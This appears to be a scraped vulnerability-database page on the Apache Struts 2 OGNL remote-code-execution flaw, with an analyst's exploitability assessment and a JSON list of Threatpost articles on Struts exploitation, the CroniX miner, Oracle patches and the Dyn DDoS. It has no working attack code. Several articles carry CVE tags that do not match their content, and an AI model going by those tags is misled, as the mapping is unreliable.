Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
**Recent assessments:**
**wvu-r7** at September 03, 2020 4:30pm UTC reported:
Unlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts’ Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.
**I don’t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.
So, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 2
{"threatpost": [{"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). These are three instances where developers reuse libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of Java applications it tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett senior director of security, Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. Second, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edge sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype.png>)In an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype\u2019s is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns.png>)\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of the Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Common Collections,\u201d Jarrett said. \u201cThat Common Collections library is then used by thousands more projects.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache.png>)According to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that the unpatched versions of the software was in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating those applications that are using the vulnerable version of libraries and frameworks since flaws were patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Common Collection example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. Second are cryptographic issues representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross site scripting bugs.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats.png>)\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. Relying on third-party libraries shortens development time and can improve the safety and quality of their software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used; making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on shoulders of developers \u2013 not repositories. Writing good vulnerability-free code starts at getting good code from healthy repositories with engaged users.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket.png>)\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components such as the third-party tool SourceClear for scanning dependency chains. It also offers Bitbucket that it says allows for team development of software projects and simplifies peer review. Another features, Bitbucket Pipelines, is also designed to help developers ship high quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. Instead developers can use third party-tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github.png>)\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates a minority GitHub developers take advantage of software scanning and auditing tools. \u201cUnfortunately security isn\u2019t a developers first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police their own software isn\u2019t feasible, not part of their mission and nothing they plan to do. They point out, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at nipping the problem at the bud is the used of automated security vulnerability and configuration scanning for open source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs.png>)The Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. According to Node.js the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. \u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update **DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. Gillian Christensen, acting deputy press secretary for DHS said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nIt\u2019s unclear, at this time, the source of the DDoS attack, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications said he had been monitoring the attack and the likely source were overseas hackers targeting U.S. cyber infrastructure. He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Marai.\u201d\n\nSecurity firm Flashpoint also identified Marai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principle security researcher at Tripwire said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO, Michael DeCesare said that attacks, such as the ones carried out Friday, are exasperated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\nLevel3 live outage map on Friday 9:50 AM (EDT)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\nLevel3 live outage map on Friday 5:20 PM (EDT)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout. \n_\n", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": "THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud 